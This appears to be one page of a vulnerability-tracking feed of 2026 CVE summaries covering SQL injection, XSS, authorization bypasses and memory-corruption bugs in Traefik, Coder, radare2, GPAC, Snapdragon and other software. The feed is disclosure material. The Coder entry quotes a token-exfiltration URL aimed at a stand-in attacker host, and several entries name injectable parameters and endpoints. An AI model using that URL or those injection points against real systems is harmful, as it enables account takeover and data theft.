Skip to main content
CVE-2026-54765 MEDIUM PATCH This Month

Filter context poisoning in Traefik v3.7.0-v3.7.5 allows a low-privileged Kubernetes user to cause security-sensitive backendRef filters - such as tenant identity or authorization headers trusted by the backend - to be applied to requests from a different, co-located HTTPRoute that targets the same backend Service:port. This affects multi-tenant Kubernetes Gateway API deployments and can cross namespace boundaries when a ReferenceGrant permits cross-namespace backend targeting, making it an authorization bypass and tenant-isolation failure. No public exploit identified at time of analysis; the issue is fixed in Traefik v3.7.6.

Authentication Bypass Kubernetes Traefik
NVD GitHub
CVSS 4.0
6.3
EPSS
0.4%
CVE-2026-55431 MEDIUM PATCH GHSA This Month

Session token leakage in Coder's CLI (github.com/coder/coder v2) lets a malicious template author steal a user's session token when the victim runs `coder open app`. The `coder open app` command opens external workspace-app URLs without scheme/host validation and substitutes the `$SESSION_TOKEN` placeholder with the user's real token before passing the URL to the OS open handler, so a workspace-controlled URL like `https://attacker.example/?t=$SESSION_TOKEN` exfiltrates the token and enables full account impersonation for its lifetime; the same path can invoke arbitrary local URI-scheme handlers. No public exploit identified at time of analysis, and it is not listed in CISA KEV.

RCE
NVD GitHub
CVSS 3.1
6.1
EPSS
0.4%
CVE-2026-14799 LOW POC Monitor

SQL injection in CodeAstro Ecommerce Website 1.0 exposes the `/customer/my_account.php?my_wishlist` endpoint to database manipulation via the unsanitized `delete_wishlist` parameter, allowing remote attackers with a valid customer account to read or modify backend database contents. The CVSS 4.0 vector (PR:L) confirms exploitation requires an authenticated customer session, constraining the attack surface to registered users. A public proof-of-concept exploit has been released, no public exploit identified as confirmed actively exploited (not in CISA KEV), though the low barrier to exploitation once authenticated elevates practical risk.

SQLi PHP Ecommerce Website
NVD VulDB GitHub
CVSS 4.0
2.1
EPSS
0.2%
CVE-2026-14796 LOW POC Monitor

SQL injection in CodeAstro Apartment Visitor Management System 1.0 exposes backend database contents to authenticated low-privileged remote attackers via the unsanitized `fromdate` parameter in `/apartment-visitor/report.php`. The CVSS 4.0 vector confirms network-accessible exploitation requiring only low-privilege credentials. Publicly available exploit code has been published on GitHub (github.com/lilukun337/cve/issues/7), though no active exploitation has been confirmed by CISA KEV. The injection enables read and limited write access to the underlying database, with a moderate combined impact score of 5.3.

SQLi PHP Apartment Visitor Management System
NVD VulDB GitHub
CVSS 4.0
2.1
EPSS
0.2%
CVE-2026-14798 LOW POC Monitor

SQL injection in CodeAstro Apartment Visitor Management System 1.0 allows authenticated remote attackers to manipulate backend database queries via the visname parameter in /apartment-visitor/visitor-entry.php. The flaw, classified as CWE-89, yields partial confidentiality, integrity, and availability impact against the vulnerable system. A publicly available proof-of-concept exploit exists on GitHub, lowering the skill bar for exploitation, though no confirmed active exploitation (CISA KEV) has been recorded at time of analysis.

SQLi PHP Apartment Visitor Management System
NVD VulDB GitHub
CVSS 4.0
2.1
EPSS
0.2%
CVE-2026-14797 LOW POC Monitor

SQL injection in CodeAstro Apartment Visitor Management System 1.0 exposes the application's database to remote authenticated attackers through the unsanitized `editid` parameter in `/apartment-visitor/edit-apartment.php`. Low-privilege authenticated users can manipulate this parameter to read, modify, or partially disrupt database contents. A public proof-of-concept exploit has been disclosed on GitHub (no public exploit identified in CISA KEV at time of analysis), making this a realistic risk for any internet-exposed deployment of this PHP application.

SQLi PHP Apartment Visitor Management System
NVD VulDB GitHub
CVSS 4.0
2.1
EPSS
0.2%
CVE-2026-14795 LOW POC Monitor

SQL injection in CodeAstro Apartment Visitor Management System 1.0 allows authenticated remote attackers to manipulate database queries through the `remark` parameter of `/apartment-visitor/action-visitor.php`. A low-privileged user can extract, modify, or delete underlying database contents. A public proof-of-concept exploit has been disclosed on GitHub (no public exploit identified as CISA KEV, but POC availability lowers the bar for exploitation).

SQLi PHP Apartment Visitor Management System
NVD VulDB GitHub
CVSS 4.0
2.1
EPSS
0.2%
CVE-2025-8591 MEDIUM PATCH This Month

Reflected cross-site scripting across at least eight WSO2 platform products - including Identity Server, API Manager, API Control Plane, Traffic Manager, Universal Gateway, Open Banking AM/IAM, and Identity Server as Key Manager - allows unauthenticated remote attackers to inject arbitrary script via unsanitized URL parameters. An attacker who tricks an authenticated user into clicking a crafted link can redirect the victim to a malicious site, tamper with rendered page content, or exfiltrate non-session browser data; partial mitigation is provided by httpOnly flags on session cookies, which block direct session token theft. No public exploit identified at time of analysis; WSO2 self-reported the issue and published advisory WSO2-2025-4343.

XSS Wso2 Identity Server Wso2 Api Manager Wso2 Api Control Plane Wso2 Traffic Manager +4
NVD VulDB
CVSS 3.1
6.1
EPSS
0.2%
CVE-2026-14800 LOW POC Monitor

Cross-site request forgery in imhamzaazam ecommerceFlask allows a remote, unauthenticated attacker to induce authenticated victims into executing unauthorized state-changing actions against the application. The vulnerability exists in an unspecified function of the Flask-based e-commerce application up to commit cb7d9e24c30a99379651b7493b32048126ef402b, with no patch released and the project maintainer not yet responding. A publicly available proof-of-concept exploit has been disclosed via a GitHub issue, and the application's rolling release model means no fixed version can be identified.

CSRF Ecommerceflask
NVD VulDB GitHub
CVSS 4.0
2.1
EPSS
0.2%
CVE-2026-54724 MEDIUM GHSA This Month

Open redirect in Kiwi TCMS's account confirmation endpoint allows unauthenticated remote attackers to craft URLs hosted on a legitimate organizational Kiwi TCMS instance that silently redirect victims to arbitrary external domains. All deployments running versions prior to v16.1 are affected, with no authentication required from the attacker - only a victim click. The primary threat is high-trust phishing: because the malicious link originates from the organization's own hostname, it bypasses email security filters and link-reputation checks, enabling convincing credential-harvesting or malware delivery campaigns targeting engineering and QA staff. No active exploitation is confirmed (not in CISA KEV), and no public exploit code has been identified at time of analysis.

Open Redirect
NVD GitHub
CVSS 3.1
6.1
CVE-2026-14791 LOW POC Monitor

Cross-site scripting in Crater invoice application (up to v6.0.6) allows an authenticated attacker to inject malicious script payloads via the invoice notes field, executing in the browser of any user who subsequently views the crafted invoice. The vulnerable function getFormattedString in app/Http/Requests/InvoicesRequest.php performs insufficient neutralization of the notes argument, classified under CWE-79. A public proof-of-concept exploit exists; no vendor patch has been released as the project has not responded to the coordinated disclosure made via GitHub issue #1327.

XSS PHP Crater
NVD VulDB GitHub
CVSS 4.0
2.0
EPSS
0.2%
CVE-2026-7185 MEDIUM PATCH This Month

Path traversal in the T-Systems TAO 2.0 suite - spanning Archivo, MyTAO, Estima, and BuroWeb - allows an authenticated low-privileged attacker to escape the application's intended file scope via crafted paths submitted to web-based file management or upload features, yielding high confidentiality impact. The CVSS 4.0 vector confirms network accessibility with low privileges required and an additional attack prerequisite (AT:P), tempering the otherwise straightforward exploitation profile. A vendor patch is available per INCIBE advisory; no public exploit code or CISA KEV listing has been identified at time of analysis.

Path Traversal Archivo Mytao Estima Buroweb
NVD
CVSS 4.0
6.0
EPSS
0.3%
CVE-2026-58403 MEDIUM PATCH This Month

Symlink traversal in Hugo's virtual filesystem (v0.123.0-v0.163.0) allows a symlink planted inside a theme or local mount to escape the mount sandbox and return the contents of arbitrary files accessible to the OS user running the hugo build. A regression in RootMappingFs.statRoot introduced a Stat call where Lstat was required, silently resolving symlinks that cross mount boundaries. No public exploit code or CISA KEV listing exists; the issue is fixed in v0.163.1.

Information Disclosure Hugo
NVD GitHub
CVSS 4.0
5.9
EPSS
0.4%
CVE-2026-14789 LOW POC PATCH Monitor

Stack-based buffer overflow in radare2 up to version 6.1.6 allows a local low-privileged attacker to crash the application by supplying a crafted MDMP (Windows minidump) file that triggers a memory corruption in the Memory64ListStream parser. Impact is limited to availability - no confidentiality or integrity compromise is indicated by the CVSS 4.0 vector (VC:N/VI:N/VA:L). A public proof-of-concept exists via GitHub issue #26051, and an upstream patch commit is available, though no formally tagged release version has been confirmed in the provided data.

Buffer Overflow Stack Overflow Radare2
NVD VulDB GitHub
CVSS 4.0
1.9
EPSS
0.1%
CVE-2025-15668 LOW POC PATCH Monitor

Heap-based buffer overflow in GPAC's MP4Box component allows a local low-privileged attacker to crash the application by supplying a crafted MP4 file. The vulnerable function `sgpd_del_entry` in `src/isomedia/box_code_base.c` mishandles the `data` argument during Sample Group Description Box parsing, triggering an out-of-bounds heap write. A public proof-of-concept exploit exists; however, the vulnerability is not in CISA KEV and the CVSS 4.0 score of 4.8 reflects limited availability-only impact with no confidentiality or integrity compromise.

Heap Overflow Buffer Overflow Gpac
NVD VulDB GitHub
CVSS 4.0
1.9
EPSS
0.1%
CVE-2026-14790 LOW POC PATCH Monitor

Null pointer dereference in GPAC 26.02.0's nhmldump_send_frame function (src/filters/write_nhml.c) allows a local, low-privileged attacker to crash the application by supplying crafted media input to the NHML write filter. Impact is strictly limited to availability - a process-level denial of service with no confidentiality or integrity implications. A publicly available proof-of-concept exploit exists (GitHub issue #3596), though the vendor itself characterizes this class of issue as 'more bugs than vulns,' contextualizing it as a robustness fix rather than an urgent security incident.

Denial Of Service Null Pointer Dereference Gpac
NVD VulDB GitHub
CVSS 4.0
1.9
EPSS
0.1%
CVE-2026-14788 LOW POC PATCH Monitor

Use-after-free in radare2's r_core_bin_load function (libr/core/cfile.c) affects all versions up to and including 6.1.6, allowing a local low-privileged user to trigger memory corruption resulting in a denial of service. A public proof-of-concept exists (GitHub issue #26049), confirmed by the CVSS 4.0 E:P exploitability modifier, though the vulnerability is not listed in CISA KEV and no confirmed widespread active exploitation is known. The CVSS 4.0 score of 4.8 (Medium) reflects the strictly local attack vector, limited availability impact, and absence of confidentiality or integrity compromise.

Memory Corruption Denial Of Service Use After Free Radare2
NVD VulDB GitHub
CVSS 4.0
1.9
EPSS
0.1%
CVE-2026-14786 LOW POC PATCH Monitor

Integer overflow in radare2's `r_str_word_get0set` function (libr/util/str.c) allows a local low-privileged attacker to crash the application on versions up to 6.1.6. The CWE-190 integer wraparound can produce a buffer overflow condition, degrading availability of the radare2 analysis session. A public proof-of-concept exists (GitHub issue #26047), though the vulnerability is not listed in CISA KEV and the CVSS 4.0 score of 1.9 reflects genuinely minimal real-world risk given its local-only, low-impact nature.

Integer Overflow Buffer Overflow Radare2
NVD VulDB GitHub
CVSS 4.0
1.9
EPSS
0.1%
CVE-2026-14787 LOW POC PATCH Monitor

Integer overflow in radare2's pb Print Command Handler affects all versions through 6.1.6, exploitable locally by a low-privileged user to crash the radare2 process. The flaw resides in the cmd_print function within libr/core/cmd_print.inc and results in availability impact only - no confidentiality or integrity loss is indicated. Publicly available exploit code exists per the GitHub issue tracker, though no active exploitation has been confirmed via CISA KEV.

Integer Overflow Buffer Overflow Radare2
NVD VulDB GitHub
CVSS 4.0
1.9
EPSS
0.1%
CVE-2025-15667 LOW POC PATCH Monitor

Double-free memory corruption in GPAC MP4Box up to version 2.5-DEV allows a local, low-privileged attacker to trigger heap corruption via a crafted MP4 file processed by the `gf_isom_nalu_sample_rewrite` function, resulting in low availability impact (crash). No confidentiality or integrity impact is indicated by the CVSS 4.0 vector despite the 'Information Disclosure' tag in VulDB, which appears inconsistent with the scored metrics. A public POC exists at GitHub, but no active exploitation has been confirmed and this CVE is not listed in CISA KEV.

Information Disclosure Gpac
NVD VulDB GitHub
CVSS 4.0
1.9
EPSS
0.1%
CVE-2026-14778 MEDIUM This Month

Improper authorization in SourceCodester Online Examination & Learning Management System 1.0 allows unauthenticated remote attackers to manipulate enrollment records by supplying arbitrary student_id, schedule_id, or action values to /ajax_enroll.php. The vulnerability is an Insecure Direct Object Reference (IDOR) - the application performs no ownership or privilege check before processing enrollment actions on behalf of any student. A public proof-of-concept has been disclosed (referenced by VulDB submission 850695 and GitHub advisory OE-LMS-IDOR-ajax_enroll.md); no active exploitation via CISA KEV has been confirmed at time of analysis.

Information Disclosure PHP
NVD GitHub VulDB
CVSS 4.0
5.5
EPSS
0.3%
CVE-2026-48267 MEDIUM This Month

Null Pointer Dereference in Adobe DNG SDK versions 1.7.1 build 2536 and earlier allows an attacker to crash any application embedding the SDK by supplying a specially crafted DNG file. The flaw is strictly a denial-of-service with no confidentiality or integrity impact, and requires a victim to open the malicious file, constraining realistic exposure to imaging pipelines or end-user applications that ingest untrusted DNG content. No public exploit code and no active exploitation have been identified at time of analysis.

Denial Of Service Null Pointer Dereference Dng Sdk
NVD VulDB
CVSS 3.1
5.5
EPSS
0.1%
CVE-2026-44362 MEDIUM PATCH This Month

Subkey rollback protection in OP-TEE OS versions 3.20.0 through 4.10.x is completely non-functional due to a missing field assignment in the Trusted Application loading pipeline, allowing revoked or downgraded subkeys to authenticate TAs without detection. A locally authenticated attacker who can supply TA binaries to the REE filesystem loader can bypass the entire key-chain revocation model, loading previously invalidated trusted code into the TrustZone secure world. No public exploit has been identified at time of analysis and this is not listed in CISA KEV, but the integrity impact is categorical - the rollback database never advances, permanently defeating the control for any deployment relying on subkey-based TA signing chains.

Authentication Bypass Linux Optee Os
NVD GitHub
CVSS 3.1
5.5
EPSS
0.1%
CVE-2026-59089 MEDIUM This Month

Integer overflow in GIMP's PlayStation TIM image loader crashes the plug-in when processing a maliciously crafted TIM file, resulting in denial of service. The flaw affects GIMP as packaged on Red Hat Enterprise Linux 6 through 9, where the TIM loader multiplies two 16-bit unsigned short values (num_colors × num_cluts) without bounds checking, producing a 32-bit overflow that corrupts CLUT size calculation and triggers an abort. No public exploit code has been identified at time of analysis, and exploitation requires user interaction to open a crafted file, limiting real-world impact to targeted social engineering scenarios.

Integer Overflow Denial Of Service Red Hat Enterprise Linux 6 Red Hat Enterprise Linux 7 Red Hat Enterprise Linux 8 +1
NVD VulDB
CVSS 3.1
5.5
EPSS
0.1%
CVE-2026-40257 MEDIUM PATCH This Month

Heap overflow in OP-TEE's ARM Crypto Extensions SHA-3 implementation corrupts TEE kernel memory across all platforms built with CFG_CRYPTO_WITH_CE82=y (ARMv8.2+ SHA3 extensions). The off-by-one error in the accelerated SHA-3 path overwrites memory beyond the hash state buffer, potentially corrupting all TEE kernel heap memory that follows. Affected versions span 3.21.0 through 4.11.0, and no public exploit has been identified at time of analysis, though the memory corruption primitive is significant in the context of a secure enclave.

Memory Corruption Linux Buffer Overflow Optee Os
NVD GitHub VulDB
CVSS 3.1
5.5
EPSS
0.1%
CVE-2026-55433 MEDIUM PATCH GHSA This Month

Authorization bypass in the Coder devcontainer recreate endpoint allows any authenticated user holding only read-level workspace access - such as Template Admin or Org Template Admin roles - to trigger a destructive container rebuild that destroys uncommitted in-container state. Unlike the sibling delete endpoint, which correctly enforces an ActionUpdate check, the recreate endpoint relied solely on route middleware verifying ActionRead, leaving the destructive operation unguarded against lower-privileged principals. No public exploit has been identified at time of analysis; vendor-confirmed patches are available across all supported release lines.

Authentication Bypass Denial Of Service
NVD GitHub VulDB
CVSS 3.1
5.4
EPSS
0.4%
CVE-2026-55435 MEDIUM PATCH GHSA This Month

Incorrect authorization in Coder's AI Bridge proxy (introduced in v2.30.0) permits suspended users to continue accessing LLM proxy endpoints using previously issued, unexpired API keys. The `Server.IsAuthorized` function in `coderd/aibridgeserver` validates key format, expiry, secret, and deleted/system-user status but omits the active/suspended status check present in the standard API key middleware, creating a divergence that survives indefinitely until tokens expire or are manually deleted. No public exploit code exists and the flaw is not listed in CISA KEV; the vendor patched all active release lines following coordinated disclosure by Anthropic's Security Team (ANT-2026-22446).

Authentication Bypass
NVD GitHub
CVSS 3.1
5.4
EPSS
0.3%
CVE-2026-55432 MEDIUM PATCH GHSA This Month

Port-sharing policy bypass in Coder's CreateSubAgent RPC allows an authenticated workspace owner to register sub-agent apps at sharing levels exceeding the template's administrator-configured MaxPortSharingLevel, potentially exposing workspace apps as PUBLIC to unauthenticated users via wildcard app subdomains. Exploitation is gated behind authenticated workspace ownership with an agent token and requires an Enterprise deployment with both port-sharing policy enforcement and wildcard app hostnames active - making this a meaningful privilege escalation within a constrained environment rather than a broadly exploitable network flaw. No public exploit has been identified at time of analysis; vendor-released patches are available across all supported release lines.

Authentication Bypass
NVD GitHub VulDB
CVSS 3.1
5.4
EPSS
0.3%
CVE-2026-55437 MEDIUM PATCH GHSA This Month

Stored cross-site scripting in Coder's AgentLogLine dashboard component allows any workspace owner to inject arbitrary HTML into agent log output, which renders as live markup in the browser session of any user - including administrators - who views the workspace page. The vulnerability stems from the ansi-to-html library being invoked without escapeXML: true, with output passed directly to React's dangerouslySetInnerHTML without server-side sanitization. While Coder's Content Security Policy blocks inline script execution, the attack surface still includes meta refresh redirects, CSS-based data exfiltration, UI redressing, and external image beacons; no public exploit is identified at time of analysis, and patched versions are available across all supported release lines.

XSS
NVD GitHub VulDB
CVSS 3.1
5.4
EPSS
0.3%
CVE-2026-58211 MEDIUM PATCH This Month

CVE-2026-58211 was reported by Ubuntu with no description, CVSS score, CWE, or technical detail available at time of analysis. The affected product, vulnerability class, and impact cannot be determined from available data. Security teams should monitor the Ubuntu security tracker and NVD for updates before assessing risk.

Authentication Bypass Nats Server
NVD GitHub
CVSS 3.1
5.4
EPSS
0.3%
CVE-2026-38979 MEDIUM This Month

Clickjacking in Ajenti's browser-facing login and administrative UI through v2.2.13 exposes authenticated administrators to UI redress attacks. The root cause is in ajenti-core/aj/http.py, where the core HTTP response pipeline finalizes responses via WSGI without injecting X-Frame-Options or a Content-Security-Policy frame-ancestors directive, allowing the Ajenti UI to be embedded in attacker-controlled iframes. No active exploitation has been identified - EPSS sits at 0.14% (4th percentile), SSVC exploitation is rated none, and no CISA KEV listing exists - placing this firmly in the low-urgency queue despite its medium CVSS score.

XSS N A
NVD GitHub VulDB
CVSS 3.1
5.4
EPSS
0.1%
CVE-2026-58254 MEDIUM PATCH This Month

CVE-2026-58254 has been reported through Ubuntu's vendor channel, but no description, CVSS score, CWE classification, or technical details are available in the provided intelligence data. The affected product, vulnerability class, and impact cannot be characterized at this time. No meaningful synthesis is possible without a description, patch reference, or advisory content.

Authentication Bypass Nats Server
NVD GitHub VulDB
CVSS 4.0
5.3
EPSS
0.4%
CVE-2026-14784 MEDIUM PATCH This Month

Sandbox boundary enforcement failure in PentAGI (vxcontrol) versions up to 2.1.0 allows authenticated remote users to break Docker containment controls via the Docker API client component in `backend/pkg/docker/client.go`, enabling limited information disclosure and unauthorized low-impact modifications within the Docker environment. The CVSS 4.0 vector (PR:L, AV:N, AC:L) confirms low-privilege network-reachable exploitation with no user interaction required, though all impact metrics remain Low and no host-level breakout is indicated. No public exploit code exists and this vulnerability is not listed in CISA KEV; an upstream fix is pending as an unmerged GitHub pull request.

Information Disclosure Docker Pentagi
NVD VulDB GitHub
CVSS 4.0
5.3
EPSS
0.2%
CVE-2026-53642 MEDIUM This Month

Incorrect authorization in FOSSBilling versions 0.5.6 through 0.7.2 allows authenticated clients with unverified email addresses to bypass the 'Require Email Confirmation' access control gate and read sensitive financial account data - including wallet balances and full transaction history - across all client-area pages. The application maintains two separate authorization layers: an API-level guard that correctly restricts unverified clients, and a page-level routing guard that is overly permissive, admitting any request whose URL path begins with /client, creating an exploitable enforcement gap. No public exploit has been identified at time of analysis; the CVSS 4.0 score of 5.3 reflects a realistic but bounded confidentiality impact gated behind prior authentication.

Authentication Bypass
NVD GitHub VulDB
CVSS 4.0
5.3
EPSS
0.2%
CVE-2026-14793 MEDIUM PATCH This Month

Authorization bypass in Craft CMS up to 4.18.0.1 allows authenticated low-privilege users to invoke the reorder-sets endpoint and manipulate Global Set ordering outside their authorized scope. The flaw resides in the actionReorderSets function of GlobalsController.php and is classified as CWE-639 (Authorization Bypass Through User-Controlled Key), an IDOR-class root cause where resource-level permission checks are absent. No public exploit has been identified at time of analysis and no CISA KEV listing exists; a vendor-released patch is available in version 4.18.1.

Authentication Bypass PHP Cms
NVD VulDB GitHub
CVSS 4.0
5.3
EPSS
0.2%
CVE-2026-14794 MEDIUM PATCH This Month

Improper authorization in Craft CMS up to 4.18.0.1 allows authenticated low-privileged users to access new user statistics for arbitrary user groups via the Charts endpoint. The flaw resides in the `actionGetNewUsersData` function within `src/controllers/ChartsController.php`, where the `userGroupId` parameter is not properly validated against the requesting user's authorization scope, enabling horizontal privilege escalation to read data across user group boundaries. No public exploit has been identified at time of analysis, but a vendor-released patch is available in version 4.18.1.

Authentication Bypass PHP Cms
NVD VulDB GitHub
CVSS 4.0
5.3
EPSS
0.2%
CVE-2026-59710 MEDIUM PATCH This Month

Stored cross-site scripting in the showdown JavaScript Markdown-to-HTML library allows an unauthenticated attacker to inject arbitrary HTML and script-executing SVG elements by placing double-quote characters inside Markdown table headers. The unescaped content is written directly into HTML id attributes by the parseHeaders function in src/subParsers/makehtml/tables.js, and the payload is stored and later executed in every victim's browser that views the rendered output. No active exploitation has been confirmed (not in CISA KEV) and no EPSS data was supplied, but the default github flavor configuration means most showdown deployments are affected without any non-default setup required.

XSS Showdown
NVD GitHub VulDB
CVSS 4.0
5.3
EPSS
0.2%
CVE-2026-59711 MEDIUM This Month

Cross-site scripting in Showdown (all versions ≤ 2.1.0) allows network-accessible injection of arbitrary HTML and JavaScript into rendered pages when the non-default `completeHTMLDocument` option is enabled. Unescaped `<` and `>` characters in Markdown frontmatter `title` metadata are written directly into the HTML `<title>` element, enabling title-context breakout and script execution in victim browsers. No public exploit has been identified at time of analysis and the vulnerability is not listed in CISA KEV, but the attack surface includes any web application that renders attacker-supplied Markdown with `completeHTMLDocument` enabled.

XSS Showdown
NVD GitHub VulDB
CVSS 4.0
5.3
EPSS
0.2%
CVE-2026-46453 MEDIUM PATCH This Month

Authorization bypass in Apache Camel's camel-elasticsearch-rest-client component allows unauthenticated remote attackers to override Elasticsearch query operations by injecting HTTP headers. Because the component uses unprefixed header constants ('SEARCH_QUERY', 'OPERATION', 'INDEX_NAME', 'INDEX_SETTINGS', 'ID') that are not blocked by Camel's inbound HttpHeaderFilterStrategy - which filters only 'Camel'-prefixed names - any HTTP client reaching a Camel route that fronts an elasticsearch-rest-client producer can substitute their own query body, operation type, or target index. Practical outcomes include full index enumeration via match_all, targeted document deletion, and field-level data exfiltration. No public exploit has been identified at time of analysis and this CVE is not listed in CISA KEV, but the attack requires no credentials and is trivially reproducible from the description alone.

Authentication Bypass Elastic Microsoft Apache Java +1
NVD VulDB
CVSS 3.1
5.3
EPSS
0.2%
CVE-2026-58203 MEDIUM PATCH This Month

Symlink traversal in pydantic-settings 2.12.0-2.14.1 allows a local low-privileged attacker with write access to the configured secrets directory to read arbitrary files from the host filesystem into application settings when secrets_nested_subdir=True. The same code path also bypasses the secrets_dir_max_size loading cap, undermining an advertised safety control. No public exploit or CISA KEV listing exists; the vendor-released fix is version 2.14.2.

Path Traversal Pydantic Settings
NVD GitHub VulDB
CVSS 3.1
5.3
EPSS
0.1%
CVE-2026-21370 MEDIUM This Month

Memory corruption in Qualcomm Snapdragon silicon allows a local low-privileged attacker to trigger an out-of-bounds write (CWE-787) by submitting input with a buffer plane count or batch size exceeding the maximum allowed value. The scope change in the CVSS vector (S:C) indicates the corruption can escape the vulnerable component's security boundary, yielding partial confidentiality, integrity, and availability impact on an adjacent system component. No public exploit or active exploitation has been identified at time of analysis; SSVC confirms no known exploitation and non-automatable attack conditions.

Memory Corruption Buffer Overflow Snapdragon
NVD VulDB
CVSS 3.1
5.3
EPSS
0.1%
CVE-2026-21369 MEDIUM This Month

Out-of-bounds write in Qualcomm Snapdragon's flash command handler allows a local low-privileged attacker to corrupt memory by exploiting a race condition between userspace LED count modifications and kernel-side flash command processing. The CVSS scope change (S:C) indicates the corruption can reach components beyond the immediately vulnerable driver - raising the potential for privilege escalation on affected Snapdragon-based devices. No public exploit code or active exploitation has been identified at time of analysis.

Memory Corruption Buffer Overflow Snapdragon
NVD VulDB
CVSS 3.1
5.3
EPSS
0.1%
CVE-2026-21368 MEDIUM This Month

Out-of-bounds write in Qualcomm Snapdragon's JPEG command parser exposes local low-privilege users to memory corruption via crafted JPEG input. Validation checks within the parser fail to account for extra buffer writes, overwriting adjacent memory and enabling a scope change beyond the vulnerable component's boundary - consistent with Snapdragon's isolated subsystem architecture (DSP, camera ISP). Qualcomm disclosed this in its July 2026 Security Bulletin; no public exploit identified at time of analysis.

Memory Corruption Buffer Overflow Snapdragon
NVD VulDB
CVSS 3.1
5.3
EPSS
0.1%
CVE-2026-21384 MEDIUM This Month

Memory corruption in Qualcomm Snapdragon firmware triggers an out-of-bounds write (CWE-787) when prepared commands are updated using invalid port indices supplied from user space that exceed supported read client limits. The vulnerability spans an exceptionally broad portfolio of Snapdragon chipsets covering mobile, automotive, XR/AR, and connectivity platforms. No public exploit has been identified at time of analysis, and CISA SSVC assessment rates exploitation as none and the flaw as non-automatable, though the changed scope (S:C) in the CVSS vector indicates impact can propagate beyond the directly vulnerable firmware component.

Memory Corruption Buffer Overflow Snapdragon
NVD VulDB
CVSS 3.1
5.3
EPSS
0.1%
CVE-2026-58402 MEDIUM PATCH This Month

Stored XSS in Hugo's default code-block renderer allows an attacker with Markdown contribution rights to inject arbitrary JavaScript into generated static pages. Hugo versions 0.60.0 through 0.163.2 write the code-fence info-string (language identifier) directly into HTML attribute values without escaping, so a crafted info-string containing a quote character and script payload breaks out of the attribute context. No public exploit or KEV listing exists at time of analysis; the CVSS 4.0 score of 5.1 reflects the requirement for prior write access and victim interaction.

XSS Hugo
NVD GitHub VulDB
CVSS 4.0
5.1
EPSS
0.3%
CVE-2026-34167 MEDIUM PATCH This Month

Insecure Direct Object Reference (IDOR) in Coolify's ActivityMonitor Livewire component allows any authenticated user to enumerate and read activity records belonging to other teams, including full SSH process command outputs that may contain secrets, credentials, and infrastructure configuration details. Affected are all Coolify self-hosted deployments prior to version 4.0.0-beta.471. No special privileges beyond a valid user account are required, and auto-incrementing integer activity IDs make enumeration trivial. No public exploit code has been identified at time of analysis and this CVE is not in CISA KEV, but the low attack complexity and sensitive data exposure make this a meaningful risk for multi-tenant Coolify deployments.

Authentication Bypass Coolify
NVD GitHub VulDB
CVSS 3.1
5.0
EPSS
0.2%
CVE-2026-59152 MEDIUM PATCH This Month

Path traversal in LangSmith Client SDK's TracingMiddleware (versions prior to 0.8.18) enables a trust-boundary crossing where any party with LangSmith workspace trace-read access can exfiltrate arbitrary files from servers running the middleware. An attacker sends a crafted HTTP request to a TracingMiddleware-instrumented server, causing it to read a local filesystem path and upload the contents to LangSmith as a trace attachment, which the attacker then retrieves via their workspace access. No public exploit has been identified at time of analysis, but the low complexity and broadly scoped file read make this a meaningful risk for any multi-tenant or contractor-accessible LangSmith deployment.

Path Traversal Langsmith Sdk
NVD GitHub
CVSS 3.1
5.0
EPSS
0.2%
CVE-2026-53641 MEDIUM This Month

Stored XSS in FOSSBilling 0.6.0-0.7.2 allows an authenticated admin to inject persistent JavaScript payloads into email HTML content that execute in client browsers when victims view their email history. The root cause is use of the `|raw` Twig filter to embed `content_html` directly into a JavaScript template literal, bypassing all output escaping. No active exploitation or public proof-of-concept has been identified at time of analysis; EPSS data was not provided in source intelligence.

XSS Fossbilling
NVD GitHub VulDB
CVSS 4.0
4.8
EPSS
0.3%
CVE-2026-1433 MEDIUM This Month

Information disclosure in uniFLOW Universal Login Manager (ULM) Standalone exposes sensitive SMTP and LDAP integration configuration data to authenticated administrators via the Remote User Interface (RUI). The flaw, classified under CWE-522 (Insufficiently Protected Credentials), applies exclusively to Standalone ULM deployments - environments integrated with uniFLOW Server or uniFLOW Online are explicitly confirmed unaffected. No public exploit code has been identified at time of analysis, and exploitation requires high-privilege access on an adjacent network, substantially limiting real-world risk.

Information Disclosure Uniflow Ulm Universal Login Manager Standalone
NVD
CVSS 4.0
4.8
EPSS
0.2%
CVE-2026-53624 MEDIUM PATCH GHSA This Month

HSTS header delivery is permanently broken in gofiber/fiber's helmet middleware due to a logic error that compares the HTTP protocol version string ('HTTP/1.1', 'HTTP/2.0') against the literal string 'https' - a comparison that is always false in any real deployment, making the entire HSTS conditional block dead code. Applications using Fiber that configure HSTSMaxAge expecting HSTS protection receive none, silently eliminating a security control that operators believe is active. A maintainer-runnable POC confirming the bug has been published with the advisory; no CISA KEV listing exists, but any application relying on helmet for HSTS protection has had that protection stripped since the erroneous code was introduced.

Information Disclosure
NVD GitHub VulDB
CVSS 3.1
4.8
EPSS
0.2%
Prev Page 4 of 5 Next

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy